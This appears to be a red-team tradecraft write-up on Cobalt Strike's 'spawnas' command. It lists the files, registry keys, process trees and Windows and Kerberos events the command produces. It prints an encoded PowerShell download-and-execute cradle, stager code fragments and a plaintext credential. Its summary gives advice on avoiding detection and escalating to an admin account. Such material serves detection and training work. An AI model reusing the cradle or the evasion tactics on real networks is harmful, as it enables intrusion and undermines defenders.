beacon> getuid
[*] You are CYBER-LANCE\sgomez

beacon> spawnas cyber-lance\tswift Passw0rd! smb

Files

C:\ProgramData\Microsoft\User Account Pictures\CYBER-LANCE+tswift.dat
C:\Users\tswift\*

Registry

HKU\S-1-5-21-20831996-4275058261-2260353042-1105\*
HKLM\System\CurrentControlSet\Control\Session Manager\Quota System\S-1-5-21-20831996-4275058261-2260353042-1105
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-20831996-4275058261-2260353042-1105\Installer\Assemblies\Global
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-20831996-4275058261-2260353042-1105\Installer\Assemblies\c:|windows|syswow64|windowspowershell|v1.0|powershell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SyncCenter\S-1-5-21-20831996-4275058261-2260353042-1105
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-20831996-4275058261-2260353042-1105\*

Processes

Process:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
Owner:    CYBER-LANCE\sgomez

    Process:  C:\Windows\system32\conhost.exe
    Command:  \??\C:\Windows\system32\conhost.exe 0x4 
    Owner:    CYBER-LANCE\sgomez

    Process:  c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    Command:  "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    Owner:     CYBER-LANCE\sgomez

        Process:  C:\Windows\system32\conhost.exe
        Command:  \??\C:\Windows\system32\conhost.exe 0x4
        Owner:     CYBER-LANCE\sgomez

        Process:  c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
        Command:  powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADIAMQA1ADQANQAvACcAKQApAA==
        Owner:    CYBER-LANCE\tswift

            Process:  C:\Windows\system32\conhost.exe
            Command:  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Owner:     CYBER-LANCE\tswift

Event Logs

Host
PowerShell
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADIAMQA1ADQANQAvACcAKQApAA==
IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:21545/'))

Set-StrictMode -Version 2
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
Security
Event 4648 - A logon was attempted using explicit credentials.

Subject:
    Security ID:            CYBER-LANCE\sgomez
    Account Name:           sgomez
    Account Domain:         CYBER-LANCE
    Logon ID:               0x1CA1B
    Logon GUID:             {00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
    Account Name:           tswift
    Account Domain:         CYBER-LANCE
    Logon GUID:             {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Target Server:
    Target Server Name:     localhost
    Additional Information: localhost

Process Information:
    Process ID:             0x39c
    Process Name:           C:\Windows\System32\svchost.exe
Event 4624 - An account was successfully logged on.

Subject:
    Security ID:            CYBER-LANCE\sgomez
    Account Name:           sgomez
    Account Domain:         CYBER-LANCE
    Logon ID:               0x1CA1B

Logon Information:
    Logon Type:             2
    Restricted Admin Mode:  -
    Virtual Account:        No
    Elevated Token:         Yes

Impersonation Level:        Impersonation

New Logon:
    Security ID:            CYBER-LANCE\tswift
    Account Name:           tswift
    Account Domain:         CYBER-LANCE
    Logon ID:               0x996A0
    Linked Logon ID:        0x996BB
    Network Account Name:   -
    Network Account Domain: -
    Logon GUID:             {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Process Information:
    Process ID:             0x39c
    Process Name:           C:\Windows\System32\svchost.exe

Network Information:
    Workstation Name:       DESKTOP-01
    Source Network Address: ::1
    Source Port:            0
Event 4627 - Group membership information.

Subject:
    Security ID:        CYBER-LANCE\sgomez
    Account Name:       sgomez
    Account Domain:     CYBER-LANCE
    Logon ID:           0x1CA1B

Logon Type:             2

New Logon:
    Security ID:        CYBER-LANCE\tswift
    Account Name:       tswift
    Account Domain:     CYBER-LANCE
    Logon ID:           0x996A0
Event 4672 - Special privileges assigned to new logon.

Subject:
    Security ID:        CYBER-LANCE\tswift
    Account Name:       tswift
    Account Domain:     CYBER-LANCE
    Logon ID:           0x996A0

Privileges:             SeSecurityPrivilege
                        SeTakeOwnershipPrivilege
                        SeLoadDriverPrivilege
                        SeBackupPrivilege
                        SeRestorePrivilege
                        SeDebugPrivilege
                        SeSystemEnvironmentPrivilege
                        SeImpersonatePrivilege
                        SeDelegateSessionUserImpersonatePrivilege
DC
Security
Event 4768 - A Kerberos authentication ticket (TGT) was requested.

Account Information:
    Account Name:               tswift
    Supplied Realm Name:        cyber-lance
    User ID:                    CYBER-LANCE\tswift

Service Information:
    Service Name:               krbtgt
    Service ID:                 CYBER-LANCE\krbtgt

Network Information:
    Client Address:             ::ffff:172.16.2.10
    Client Port:                49740

Additional Information:
    Ticket Options:             0x40810010
    Result Code:                0x0
    Ticket Encryption Type:     0x12
    Pre-Authentication Type:    2
Event 4769 - A Kerberos service ticket was requested.

Account Information:
    Account Name:               [email protected]
    Account Domain:             CYBER-LANCE.LOCAL
    Logon GUID:                 {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Service Information:
    Service Name:               DESKTOP-01$
    Service ID:                 CYBER-LANCE\DESKTOP-01$

Network Information:
    Client Address:             ::ffff:172.16.2.10
    Client Port:                49741

Additional Information:
    Ticket Options:             0x40810000
    Ticket Encryption Type:     0x12
    Failure Code:               0x0
    Transited Services:         -

Summary

This function is very noisy when it comes to host-based indicators, as it creates hundreds of user directories and registry entries. I recommend refraining from using this on a machine where it’s improbable the account would be in use legitimately. If you’re on a workstation, using the account of a desktop support engineer may blend in more, but something like an MSSQL service account is going to look more out of place.

Events 4624, 4627 & 4648 give away that a standard user is explicilty using the credentials of a domain admin (a-la RunAs), which is extra-suspicious given they are completely different named accounts. It may be more effective to reserve this to scenarios where separate user and admin accounts are in use. Compromise the workstation beloning to sgomez, then use this function to spawn a new beacon as sgomez_admin.

Don’t forget to leverage spawnto and ppid to change the process Beacon will launch for its post-explotation jobs and the parent they are run under. Always carry out your situational awareness to enable your activities to blend in with your targets normal day-to-day operations.